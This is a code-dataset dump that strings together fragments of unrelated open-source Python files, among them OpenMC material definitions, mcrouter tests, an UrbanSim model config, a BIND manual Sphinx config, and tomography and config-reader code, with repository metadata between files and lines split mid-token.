pyqt_sip_dir = os.path.join(sys.prefix, 'sip', 'PyQt4')
else:
pyqt_sip_dir = os.path.join(sys.prefix, 'share', 'sip', 'PyQt4')
return pyqt_sip_dir
def get_qt4_tag(sip_flags):
in_t = F
|
alse
for item in sip_flags.split(' '):
if item == '-t':
in_t = True
elif in_t:
if item.startswith('Qt_4'):
return item
else:
in_t = False
raise ValueError('Cannot find Qt\'s tag in PyQt4\'s SIP flags.')
if __name__ == '__main__':
try:
import PyQt4.pyqtconfig
pyqtcfg = PyQt4.pyqtconfig.Configuration()
sip_dir = pyqtcfg.pyqt_sip_dir
sip_flags = pyqtcfg.pyqt_sip_flags
except ImportError:
# PyQt4 >= 4.10.0 was built with configure-ng.py instead of
# configure.py, so pyqtconfig.py is not installed.
sip_dir = get_default_sip_dir()
sip_flags = PyQt4.QtCore.PYQT_CONFIGURATION['sip_flags']
print('pyqt_version:%06.x' % PyQt4.QtCore.PYQT_VERSION)
print('pyqt_version_str:%s' % PyQt4.QtCore.PYQT_VERSION_STR)
print('pyqt_version_tag:%s' % get_qt4_tag(sip_flags))
print('pyqt_sip_dir:%s' % sip_dir)
print('pyqt_sip_flags:%s' % sip_flags)
|
lilulu/openmc
|
openmc/material.py
|
Python
|
mit
| 18,937
| 0.000422
|
from collections import Iterable
from copy import deepcopy
from numbers import Real, Integral
import warnings
from xml.etree import ElementTree as ET
import sys
if sys.version_info[0] >= 3:
basestring = str
import openmc
from openmc.checkvalue import check_type, check_value, check_greater_than
from openmc.clean_xml import *
# A list of all IDs for all Materials created
MATERIAL_IDS = []
# A static variable for auto-generated Material IDs
AUTO_MATERIAL_ID = 10000
def reset_auto_material_id():
global AUTO_MATERIAL_ID, MATERIAL_IDS
AUTO_MATERIAL_ID = 10000
MATERIAL_IDS = []
# Units for density supported by OpenMC
DENSITY_UNITS = ['g/cm3', 'g/cc', 'kg/cm3', 'at/b-cm', 'at/cm3', 'sum']
# Constant for density when not needed
NO_DENSITY = 99999.
class Material(object):
"""A material composed of a collection of nuclides/elements that can be assigned
to a region of space.
Parameters
----------
material_id : int, optional
Unique identifier for the material. If not specified, an identifier will
automatically be assigned.
name : str, optional
Name of the material. If not specified, the name will be the empty
string.
Attributes
----------
id : int
Unique identifier for the material
density : float
Density of the material (units defined separately)
density_units : str
Units used for `density`. Can be one of 'g/cm3', 'g/cc', 'kg/cm3',
'atom/b-cm', 'atom/cm3', or 'sum'.
"""
def __init__(self, material_id=None, name=''):
# Initialize class attributes
self.id = material_id
self.name = name
self._density = None
self._density_units = ''
# A dictionary of Nuclides
# Keys - Nuclide names
# Values - tuple (nuclide, percent, percent type)
self._nuclides = {}
# A dictionary of Elements
# Keys - Element names
# Values - tuple (element, percent, percent type)
self._elements = {}
# If specified, a list of tuples of (table name, xs identifier)
self._sab = []
# If true, the material will be initialized as distributed
self._convert_to_distrib_comps = False
# If specified, this file will be used instead of composition values
self._distrib_otf_file = None
@property
def id(self):
return self._id
@property
def name(self):
return self._name
@property
def density(self):
return self._density
@property
def density_units(self):
return self._density_units
@property
def convert_to_distrib_comps(self):
return self._convert_to_distrib_comps
@property
def distrib_otf_file(self):
return self._distrib_otf_file
@id.setter
def id(self, material_id):
global AUTO_MATERIAL_ID, MATERIAL_IDS
# If the Material already has an ID, remove it from global list
if hasattr(self, '_id') and self._id is not None:
MATERIAL_IDS.remove(self._id)
if material_id is None:
|
self._id = AUTO_MATERIAL_ID
MATERIAL_IDS.append(AUTO_MATERIAL_ID)
AUTO_MATERIAL_ID += 1
else:
check_type('material ID', material_id, Integral)
if material_id in MATERIAL_IDS:
msg = 'Unable to set Material ID to {0} since a Material with ' \
'this ID was already init
|
ialized'.format(material_id)
raise ValueError(msg)
check_greater_than('material ID', material_id, 0)
self._id = material_id
MATERIAL_IDS.append(material_id)
@name.setter
def name(self, name):
check_type('name for Material ID={0}'.format(self._id),
name, basestring)
self._name = name
def set_density(self, units, density=NO_DENSITY):
"""Set the density of the material
Parameters
----------
units : str
Physical units of density
density : float, optional
Value of the density. Must be specified unless units is given as
'sum'.
"""
check_type('the density for Material ID={0}'.format(self._id),
density, Real)
check_value('density units', units, DENSITY_UNITS)
if density == NO_DENSITY and units is not 'sum':
msg = 'Unable to set the density Material ID={0} ' \
'because a density must be set when not using ' \
'sum unit'.format(self._id)
raise ValueError(msg)
self._density = density
self._density_units = units
@distrib_otf_file.setter
def distrib_otf_file(self, filename):
# TODO: remove this when distributed materials are merged
warnings.warn('This feature is not yet implemented in a release '
'version of openmc')
if not isinstance(filename, basestring) and filename is not None:
msg = 'Unable to add OTF material file to Material ID={0} with a ' \
'non-string name {1}'.format(self._id, filename)
raise ValueError(msg)
self._distrib_otf_file = filename
@convert_to_distrib_comps.setter
def convert_to_distrib_comps(self):
# TODO: remove this when distributed materials are merged
warnings.warn('This feature is not yet implemented in a release '
'version of openmc')
self._convert_to_distrib_comps = True
def add_nuclide(self, nuclide, percent, percent_type='ao'):
"""Add a nuclide to the material
Parameters
----------
nuclide : str or openmc.nuclide.Nuclide
Nuclide to add
percent : float
Atom or weight percent
percent_type : str
'ao' for atom percent and 'wo' for weight percent
"""
if not isinstance(nuclide, (openmc.Nuclide, str)):
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'non-Nuclide value {1}'.format(self._id, nuclide)
raise ValueError(msg)
elif not isinstance(percent, Real):
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'non-floating point value {1}'.format(self._id, percent)
raise ValueError(msg)
elif percent_type not in ['ao', 'wo', 'at/g-cm']:
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'percent type {1}'.format(self._id, percent_type)
raise ValueError(msg)
if isinstance(nuclide, openmc.Nuclide):
# Copy this Nuclide to separate it from the Nuclide in
# other Materials
nuclide = deepcopy(nuclide)
else:
nuclide = openmc.Nuclide(nuclide)
self._nuclides[nuclide._name] = (nuclide, percent, percent_type)
def remove_nuclide(self, nuclide):
"""Remove a nuclide from the material
Parameters
----------
nuclide : openmc.nuclide.Nuclide
Nuclide to remove
"""
if not isinstance(nuclide, openmc.Nuclide):
msg = 'Unable to remove a Nuclide {0} in Material ID={1} ' \
'since it is not a Nuclide'.format(self._id, nuclide)
raise ValueError(msg)
# If the Material contains the Nuclide, delete it
if nuclide._name in self._nuclides:
del self._nuclides[nuclide._name]
def add_element(self, element, percent, percent_type='ao'):
"""Add a natural element to the material
Parameters
----------
element : openmc.element.Element
Element to add
percent : float
Atom or weight percent
percent_type : str
'ao' for atom percent and 'wo' for weight percent
"""
if not isinstance(element, openmc.Element):
msg = 'Unable to add an Element to Material ID={0} with a ' \
'non-Element value {1}'.format(self._id, element)
raise Val
|
tempbottle/mcrouter
|
mcrouter/test/test_mcrouter.py
|
Python
|
bsd-3-clause
| 13,301
| 0.001579
|
# Copyright (c) 2015, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import time
from mcrouter.test.MCProcess import Memcached
from mcrouter.test.McrouterTestCase import McrouterTestCase
class TestDevNull(McrouterTestCase):
config = './mcrouter/test/test_dev_null.json'
extra_args = []
def setUp(self):
# The order here must corresponds to the order of hosts in the .json
self.mc_good = self.add_server(Memcached())
self.mc_wild = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_dev_null(self):
mcr = self.get_mcrouter()
# finally setup is done
mcr.set("good:key", "should_be_set")
mcr.set("key", "should_be_set_wild")
mcr.set("null:key", "should_not_be_set")
mcgood_val = self.mc_good.get("good:key")
mcnull_val = self.mc_wild.get("null:key")
mcwild_val = self.mc_wild.get("key")
self.assertEqual(mcgood_val, "should_be_set")
self.assertEqual(mcnull_val, None)
self.assertEqual(mcwild_val, "should_be_set_wild")
self.assertEqual(mcr.delete("null:key2"), None)
self.assertEqual(int(mcr.stats('ods')['dev_null_requests']), 2)
class TestMigratedPools(McrouterTestCase):
config = './mcrouter/test/test_migrated_pools.json'
extra_args = []
def setUp(self):
self.wild_new = self.add_server(Memcached())
self.wild_old = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(
self.config, extra_args=self.extra_args,
replace_map={"START_TIME": (int(time.time()) + 2)})
def test_migrated_pools(self):
mcr = self.get_mcrouter()
#set keys that should be deleted in later phases
for phase in range(1, 5):
self.wild_old.set("get-key-" + str(phase), str(phase))
self.wild_new.set("get-key-" + str(phase), str(phase * 100))
# first we are in the old domain make sure all ops go to
# the old host only
self.assertEqual(mcr.get("get-key-1"), str(1))
mcr.set("set-key-1", str(42))
s
|
elf.assertEqual(self.wild_old.get("set-key-1"), str(42))
self.assertEqual(self.wild_new.get("set-key-1"), None)
mcr.delete("get-key-1")
#make sure the delete went to old but not new
self.assertEqual(self.wild_old.get("get-key-1"), None)
self.assertEqual(self.wild_new.get("get-key-1"), str(100))
#next phase
time.sleep(2)
# gets/sets go to the old place
self.assertEqual(mcr.get("get-key-2"), str(2))
m
|
cr.set("set-key-2", str(4242))
self.assertEqual(self.wild_old.get("set-key-2"), str(4242))
self.assertEqual(self.wild_new.get("set-key-2"), None)
mcr.delete("get-key-2")
#make sure the delete went to both places
self.assertEqual(self.wild_old.get("get-key-2"), None)
self.assertEqual(self.wild_new.get("get-key-2"), None)
#next phase
time.sleep(2)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-3"), str(300))
mcr.set("set-key-3", str(424242))
self.assertEqual(self.wild_old.get("set-key-3"), None)
self.assertEqual(self.wild_new.get("set-key-3"), str(424242))
mcr.delete("get-key-3")
#make sure the delete went to both places
self.assertEqual(self.wild_old.get("get-key-3"), None)
self.assertEqual(self.wild_new.get("get-key-3"), None)
#next phase
time.sleep(2)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-4"), str(400))
mcr.set("set-key-4", str(42424242))
self.assertEqual(self.wild_old.get("set-key-4"), None)
self.assertEqual(self.wild_new.get("set-key-4"), str(42424242))
mcr.delete("get-key-4")
#make sure the delete went to the new place only
self.assertEqual(self.wild_old.get("get-key-4"), str(4))
self.assertEqual(self.wild_new.get("get-key-4"), None)
class TestMigratedPoolsFailover(McrouterTestCase):
config = './mcrouter/test/test_migrated_pools_failover.json'
extra_args = []
def setUp(self):
self.a_new = self.add_server(Memcached())
self.a_old = self.add_server(Memcached())
self.b_new = self.add_server(Memcached())
self.b_old = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(
self.config, extra_args=self.extra_args,
replace_map={"START_TIME": (int(time.time()) + 2)})
def test_migrated_pools_failover(self):
mcr = self.get_mcrouter()
#set keys that should be deleted in later phases
for phase in range(1, 5):
self.a_old.set("get-key-" + str(phase), str(phase))
self.a_new.set("get-key-" + str(phase), str(phase * 10))
self.b_old.set("get-key-" + str(phase), str(phase * 100))
self.b_new.set("get-key-" + str(phase), str(phase * 1000))
# first we are in the old domain make sure all ops go to
# the old host only
self.assertEqual(mcr.get("get-key-1"), str(1))
mcr.set("set-key-1", str(42))
self.assertEqual(self.a_old.get("set-key-1"), str(42))
self.a_old.terminate()
self.assertEqual(mcr.get("get-key-1"), str(100))
mcr.set("set-key-1", str(42))
self.assertEqual(self.b_old.get("set-key-1"), str(42))
#next phase
time.sleep(2.5)
self.assertEqual(mcr.get("get-key-2"), str(200))
mcr.set("set-key-2", str(42))
self.assertEqual(self.b_old.get("set-key-2"), str(42))
#next phase
time.sleep(2.5)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-3"), str(30))
mcr.set("set-key-3", str(424242))
self.assertEqual(self.a_new.get("set-key-3"), str(424242))
self.a_new.terminate()
self.assertEqual(mcr.get("get-key-3"), str(3000))
class TestDuplicateServers(McrouterTestCase):
config = './mcrouter/test/test_duplicate_servers.json'
extra_args = []
def setUp(self):
self.wildcard = self.add_server(Memcached(), 12345)
def get_mcrouter(self):
return self.add_mcrouter(
self.config, '/a/a/', extra_args=self.extra_args)
def test_duplicate_servers(self):
mcr = self.get_mcrouter()
stats = mcr.stats('servers')
# Check that only one proxy destination connection is made
# for all the duplicate servers
self.assertEqual(1, len(stats))
# Hardcoding default server timeout
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-1000'
self.assertTrue(key in stats)
class TestDuplicateServersDiffTimeouts(McrouterTestCase):
config = './mcrouter/test/test_duplicate_servers_difftimeouts.json'
extra_args = []
def setUp(self):
self.wildcard = self.add_server(Memcached(), 12345)
def get_mcrouter(self):
return self.add_mcrouter(
self.config, '/a/a/', extra_args=self.extra_args)
def test_duplicate_servers_difftimeouts(self):
mcr = self.get_mcrouter()
stats = mcr.stats('servers')
# Check that only two proxy destination connections are made
# for all the duplicate servers in pools with diff timeout
self.assertEqual(2, len(stats))
# Hardcoding default server timeout
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-1000'
self.assertTrue(key in stats)
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-2000'
self.assertTrue(key in stats)
class TestSamePoolFailover(McrouterTestCase):
config
|
christianurich/VIBe2UrbanSim
|
3rdparty/opus/src/psrc/config/workplace_zone_choice_model_config.py
|
Python
|
gpl-2.0
| 13,587
| 0.011261
|
# Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington
# See opus_core/LICENSE
from urbansim.configs.base_configuration import AbstractUrbansimConfiguration
from opus_core.resources import merge_resources_if_not_None
import copy
"""this configuration file specifying workplace choice models:
home_based_workplace_choice_model, workplace_choice_model_for_residents,
workplace_choice_model_for_immigrants, and
simple models keeping consistency between persons and households/jobs.
Home base choice model is defined in urbansim.configs.general_configuration_with_changed_elcm
"""
config = AbstractUrbansimConfiguration()
run_configuration = config.copy()
wlcm_model_configuration = {
"estimation":"opus_core.bhhh_mnl_estimation",
"sampler":"opus_core.samplers.weighted_sampler",
"sample_size_locations":30,
"weights_for_estimation_string":"urbansim.zone.number_of_non_home_based_jobs",
"compute_capacity_flag":True,
"capacity_string":"urbansim.zone.number_of_non_home_based_jobs",
"number_of_units_string":"urbansim.zone.number_of_non_home_based_jobs",
}
run_configuration['models_configuration']['workplace_choice_model_for_resident']= wlcm_model_configuration
my_controller_configuration = {
'household_person_consistency_keeper':{
"import": {"psrc.models.persons_consistency_keeper_model":"PersonDatasetConsistencyKeeperModel"},
"init": {
"name": "PersonDatasetConsistencyKeeperModel",
"arguments": {},
},
"run": {
"arguments": {"household_set": "household",
"person_set":"person",
"expand_person_set":True,
}
},
},
# This isn't necessary since we don't explicitly match person to job, but number of jobs and persons should match at zone level
# 'job_person_consistency_keeper':{
# "import": {"psrc.models.persons_consistency_keeper_model":"PersonDatasetConsistencyKeeperModel"},
# "init": {
# "name": "PersonDatasetConsistencyKeeperModel",
# "arguments": {},
# },
# "run": {
# "arguments": {"job_set": "job",
# "person_set":"person",
# "expand_person_set":False,
# }
# },
# },
'workplace_choice_model_for_resident': {
"import": {"urbansim.models.agent_location_choice_model":"AgentLocationChoiceModel"},
"init": {
"name": "AgentLocationChoiceModel",
"arguments": {
"location_set":"zone",
"model_name":"'Non-home-based Workplace Choice Model for residents'",
"short_name":"'NHBWCM'",
"choices":"'urbansim.lottery_choices'",
"submodel_string":"'psrc.person.household_income'",
# "filter": "'psrc.job.is_untaken_non_home_based_job'",
"location_id_string":"'psrc.person.zone_id'",#"'psrc.person.workplace_zone_id'",
"run_config":"models_configuration['workplace_choice_model_for_resident']",
"estimate_config":"models_configuration['workplace_choice_model_for_resident']"
}},
"prepare_for_run": {
"name": "prepare_for_run",
"arguments": {"specification_storage": "base_cache_storage", #"models_configuration['specification_storage']",
"specification_table": "'workplace_choice_model_for_resident_specification'",
"coefficients_storage": "base_cache_storage", #"models_configuration['coefficients_storage']",
"coefficients_table": "'workplace_choice_model_for_resident_coefficients'",
},
"output": "(specification, coefficients)"
},
"run": {
"arguments": {"specification": "specification",
"coefficients":"coefficients",
"agent_set": "person",
|
"agents_index": None,
"agents_filter":"'psrc.person.is_non_home_based_worker_without_workplace_zone'",
"data_objects": "datasets",
"chunk_specification":"{'records_per_chunk':5000}",
"debuglevel": run_configuration['debuglevel'] }
},
"prepare_for_est
|
imate": {
"name": "prepare_for_estimate",
"arguments": {
"agent_set":"person",
"join_datasets": "False",
"agents_for_estimation_storage": "base_cache_storage",
"agents_for_estimation_table": "'workers_for_estimation'",
"filter":None,
"data_objects": "datasets"
},
"output": "(specification, index)"
},
"estimate": {
"arguments": {
"specification": "specification",
"agent_set": "person",
"agents_index": "index",
"data_objects": "datasets",
"debuglevel": run_configuration['debuglevel']},
"output": "(coefficients, dummy)"
},
},
"job_change_model":{
"import": {"urbansim.models.agent_relocation_model":
"AgentRelocationModel"
},
"init": {
"name": "AgentRelocationModel",
"arguments": {"choices":"opus_core.random_choices",
"probabilities":"psrc.job_change_probabilities",
"location_id_name":"'psrc.person.workplace_zone_id'",
"model_name":"job change model",
"debuglevel": config['debuglevel']
},
},
"prepare_for_run": {
"name": "prepare_for_run",
"arguments": {"what": "'person'", "rate_storage": "base_cache_storage",
"rate_table": "'annual_job_change_rates_for_workers'"},
"output": "jcm_resources"
},
"run": {
"arguments": {"agent_set": "person", "resources": "jcm_resources"},
"output": "jcm_index"
}
}
}
my_controller_configuration["workplace_choice_model_for_immigrant"] = copy.deepcopy(my_controller_configuration["workplace_choice_model_for_resident"])
my_controller_configuration["workplace_choice_model_for_immigrant"]["init"]["arguments"]["model_name"] = "'Non-home-based Workplace Choice Model for immigrants'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["prepare_for_run"]["arguments"]["specification_table"] = "'workplace_choice_model_for_immigrant_specification'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["prepare_for_run"]["arguments"]["coefficients_table"] = "'workplace_choice_model_for_immigrant_coefficients'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["run"]["arguments"]["agents_filter"] = "'psrc.person.is_immigrant_worker_without_workplace_zone'"
my_controller_configuration["home_based_workplace_choice_model"] = copy.deepcopy(my_controller_configuration["workplace_choice_model_for_resident"])
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["filter"] = "'psrc.job.is_untaken_home_based_job'"
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["model_name"] = "'Home-based Work Choice Model'"
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["short_name"] = "'HBWCM'"
my_controller_configuration["home_based_wor
|
perlang/bv9arm-chinese
|
branches/9.16.18/arm/conf.py
|
Python
|
mpl-2.0
| 5,717
| 0.000352
|
############################################################################
# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, you can obtain one at https://mozilla.org/MPL/2.0/.
#
# See the COPYRIGHT file distributed with this work for additional
# information regarding copyright ownership.
############################################################################
# flake8: noqa: E501
from typing import List, Tuple
from docutils import nodes
from docutils.nodes import Node, system_message
from docutils.parsers.rst import roles
from sphinx import addnodes
from sphinx.util.docutils import ReferenceRole
GITLAB_BASE_URL = 'https://gitlab.isc.org/isc-projects/bind9/-/'
# Custom Sphinx role enabling automatic hyperlinking to GitLab issues/MRs.
class GitLabRefRole(ReferenceRole):
def __init__(self, base_url: str) -> None:
self.base_url = base_url
super().__init__()
def run(self) -> Tuple[List[Node], List[system_message]]:
gl_identifier = '[GL %s]' % self.target
target_id = 'index-%s' % self.env.new_serialno('index')
entries = [('single', 'GitLab; ' + gl_identifier, target_id, '', None)]
index = addnodes.index(entries=entries)
target = nodes.target('', '', ids=[target_id])
self.inliner.document.note_explicit_target(target)
try:
refuri = self.build_uri()
reference = nodes.reference('', '', internal=False, refuri=refuri,
classes=['gl'])
if self.has_explicit_title:
reference += nodes.strong(self.title, self.title)
else:
reference += nodes.strong(gl_identifier, gl_identifier)
except ValueError:
error_text = 'invalid GitLab identifier %s' % self.target
msg = self.inliner.repo
|
rter.error(error_text, line=self.lineno)
prb = self.inliner.problematic(self.rawtext, self.rawtext, msg)
return [prb], [msg]
return [index, target, reference], []
def build_uri(self):
if self.target[0] == '#':
return self.base_url + 'issues/%d' % int(self.target[1:])
if self.target[0] ==
|
'!':
return self.base_url + 'merge_requests/%d' % int(self.target[1:])
raise ValueError
def setup(_):
roles.register_local_role('gl', GitLabRefRole(GITLAB_BASE_URL))
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'BIND 9 管理员参考手册'
copyright = u'2021, Internet Systems Consortium'
author = u"Internet Systems Consortium \\and 翻译: sunguonian@yahoo.com"
# The full version, including alpha/beta/rc tags
release = 'BIND 9.16.18(稳定版)'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'zh_CN'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = [
'_build',
'Thumbs.db',
'.DS_Store',
'*.grammar.rst',
'*.zoneopts.rst',
'catz.rst',
'dlz.rst',
'dnssec.rst',
'dyndb.rst',
'logging-cattegories.rst',
'managed-keys.rst',
'pkcs11.rst',
'plugins.rst'
]
# The master toctree document.
master_doc = 'index'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
#html_theme = 'alabaster'
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
latex_engine = 'xelatex'
latex_elements = {
'fontpkg': r'''
\setmainfont{Source Han Serif CN:style=Regular}
\setsansfont{Source Han Sans CN Medium:style=Medium,Regular}
\setmonofont{Source Han Sans CN:style=Regular}
\setCJKfamilyfont{song}{Source Han Serif CN:style=Regular}
\setCJKfamilyfont{heiti}{Source Han Sans CN:style=Regular}
''',
'pointsize': '11pt',
'preamble': r'\input{../mystyle.tex.txt}'
}
latex_documents = [
(master_doc, 'Bv9ARM.tex', u'BIND 9管理员参考手册', author, 'manual'),
]
latex_logo = "isc-logo.pdf"
|
danrg/RGT-tool
|
src/RGT/XML/SVG/Animation/baseAnimationNode.py
|
Python
|
mit
| 1,499
| 0.004003
|
from RGT.XML.SVG.basicSvgNode import BasicSvgNode
from RGT.XML.SVG.Attribs.conditionalProcessingAttributes import ConditionalProcessingAttributes
from RGT.XML.SVG.Attribs.xlinkAttributes import XlinkAttributes
from RGT.XML.SVG.Attribs.animationTimingAttributes import AnimationTimingAttributes
class BaseAnimationNode(BasicSvgNode):
ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED = 'externalResourcesRequired'
def __init__(self, ownerDoc, tagName):
|
BasicSvgNode.__init__(self, ownerDoc, tagName)
ConditionalProcessingAttributes.__init__(self)
XlinkAttributes.__init__(self)
AnimationTimingAttributes.__init__(self)
self._allowedSvgChildNodes.update(self.SVG_GROUP_DESCRIPTIVE_ELEMENTS)
def setExternalResourcesRequired(self, data):
allowedValues = ['true', 'false']
if data is not None:
if data not in allowedValues:
values = ''
|
for value in allowedValues:
values += value + ', '
values = values[0: len(values) - 2]
raise ValueError('Value not allowed, only ' + values + 'are allowed')
else:
self._setNodeAttribute(self.ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED, data)
def getExternalResourcesRequired(self):
node = self._getNodeAttribute(self.ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED)
if node is not None:
return node.nodeValue
return None
|
odlgroup/odl-examples
|
tomography_wavelet_split_bregman.py
|
Python
|
gpl-3.0
| 2,070
| 0.002415
|
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 11 11:34:27 2015
@author: JonasAdler
"""
# Imports for common Python 2/3 codebase
from __future__ import print_function, division, absolute_import
from future import standard_library
standard_library.install_aliases()
# External
import numpy as np
# Internal
import odl
from tomography_helper import ForwardProjector
def SplitBregmanReconstruct(A, Phi, x, rhs, la, mu, iterations=1, N=1):
""" Reconstruct with split Bregman.
Parameters
----------
A : `odl.Operator`
Pojector
Phi : `odl.Operator`
Sparsifying transform
x : ``A.domain`` element
"""
Atf = A.adjoint(rhs)
b = Phi.range.zero()
d = Phi.range.zero()
op = mu * (A.adjoint * A) + la * (Phi.adjoint * Phi)
fig = None
for i in range(iterations):
for n in range(N):
# Solve tomography part iteratively
rhs = mu
|
* Atf + la * Phi.adjoint(d-b)
odl.solvers.conjugate_gradient(op, x, rhs, niter=2)
# d = sign(Phi(x)+b) * max(|Ph
|
i(x)+b|-la^-1,0)
s = Phi(x) + b
d = s.ufunc.sign() * (s.ufunc.absolute().
ufunc.add(-1.0/la).
ufunc.maximum(0.0))
b = b + Phi(x) - d
fig = x.show(clim=[0.0, 1.1], fig=fig, show=True)
n = 100
# Create spaces
d = odl.uniform_discr([0, 0], [1, 1], [n, n])
ran = odl.uniform_discr([0, 0], [1, np.pi], [np.ceil(np.sqrt(2) * n), n])
# Create phantom
phantom = odl.util.shepp_logan(d, modified=True)
# These are tuing parameters in the algorithm
la = 500. / n # Relaxation
mu = 20000. / n # Data fidelity
# Create projector
Phi = odl.trafos.WaveletTransform(d, nscales=3, wbasis='db2', mode='per')
A = ForwardProjector(d, ran)
# Create data
rhs = A(phantom)
# Add noise
rhs.ufunc.add(np.random.rand(ran.size)*0.05, out=rhs)
# Reconstruct
x = d.zero()
#odl.solvers.conjugate_gradient_normal(A, x, rhs, niter=7)
SplitBregmanReconstruct(A, Phi, x, rhs, la, mu, 100, 1)
x.show()
|
snelis/snelis
|
snelis/management/commands/__init__.py
|
Python
|
bsd-3-clause
| 1,601
| 0.001874
|
import re
class CommandError(Exception):
pass
class BaseCommand():
"""
Base command, this will accept and handle some generic features of all commands.
Like error handling, argument retrieving / checking
"""
def __init__(self, args):
"""
Initialize the class
"""
self._args = args
def ar
|
g(self, key):
"""
Retrieve a single argument
"""
return self._args.get(key)
def args(self, *keys):
"""
Retrieve a set of argument
"""
if keys:
return [self.arg(k) for k in keys]
else:
return self._args
def value(self, key):
"""
Retrieve a single argument
"""
k
|
ey = '<{0}>'.format(key)
return self.arg(key)
def option(self, key, value=None):
"""
Retrieve a single argument
"""
key = '--'+key
if value:
return self.arg(key) == value
return self.arg(key)
def args_context(self):
"""
Convert all options and values into a context usable by the template parser
"""
context = dict(options={}, values={})
for key, value in self.args().items():
expressions = {
'options': r'--(.*)',
'values': r'<(.*)>',
}
for group, expression in expressions.items():
matches = re.search(expression, key)
if matches:
context[matches.group(1).replace('-', '_')] = value
return context
|
PythonRails/examples
|
blog/config.py
|
Python
|
mit
| 218
| 0
|
"""
Configurati
|
on for a project.
"""
rails = {
'models.engine': 'sqlalchemy',
'models.db.type': 'postgres',
'models.db.user': 'rails',
'models.db.password': 'rails
|
',
'views.engine': 'jinja',
}
|
jklaiho/django-class-fixtures
|
class_fixtures/utils/__init__.py
|
Python
|
bsd-3-clause
| 214
| 0.004673
|
import sys
from contextlib import contextm
|
anager
|
from StringIO import StringIO
@contextmanager
def string_stdout():
output = StringIO()
sys.stdout = output
yield output
sys.stdout = sys.__stdout__
|
LeXuZZ/localway_tests
|
wtframework/wtf/tests/test_config_reader.py
|
Python
|
gpl-3.0
| 3,596
| 0.003337
|
##########################################################################
#This file is part of WTFramework.
#
# WTFramework is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WTFramework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WTFramework. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from wtframework.wtf.config import ConfigReader, ConfigFileReadError
import unittest
class TestConfigReader(unittest.TestCase):
def test_get_returns_string_config_value(self):
'''
Test config value returned is expected value
'''
config = ConfigReader("tests/TestConfigReaderData")
value = config.get("string_test")
self.assertEqual(value, "some value", "Value did not match expected.")
def test_get_with_default_value(self):
"Test the get method returns value if available or the the default."
config = ConfigReader("tests/TestConfigReaderData")
self.assertEqual("some value", config.get("string_test", "default value"))
self.assertEqual("default value", config.get("i_dont_exist", "default value"))
def test_get_handles_namespaced_keys(self):
'''
Test ConfigReader works with namespaced keys like, path.to.element
'''
config = ConfigReader("tests/TestConfigReaderData")
value = config.get("bill-to.given")
self.assertEqual(value, "Chris", "Value did not match expected.")
def test_get_handles_yaml_arrays(self):
'''
Test ConfigReader works with YAML arrays.
'''
config = ConfigReader("tests/TestConfigReaderData")
self.assertEqual("dogs", config.get("list_test")[0])
self.assertEqual("cats", config.get("list_test")[1])
self.assertEqual("badgers", config.get("list_test")[2])
def test_get_with_cascaded_config_files(self):
'''
Test Config reader loaded up with multiple configs loads
the config preferences in order.
'''
config = ConfigReader("tests/TestConfig2;tests/TestConfig1")
# should take config from config1
self.assertEqual("hello", config.get("setting_from_config1"))
# this will take the config from config2, which has precedence.
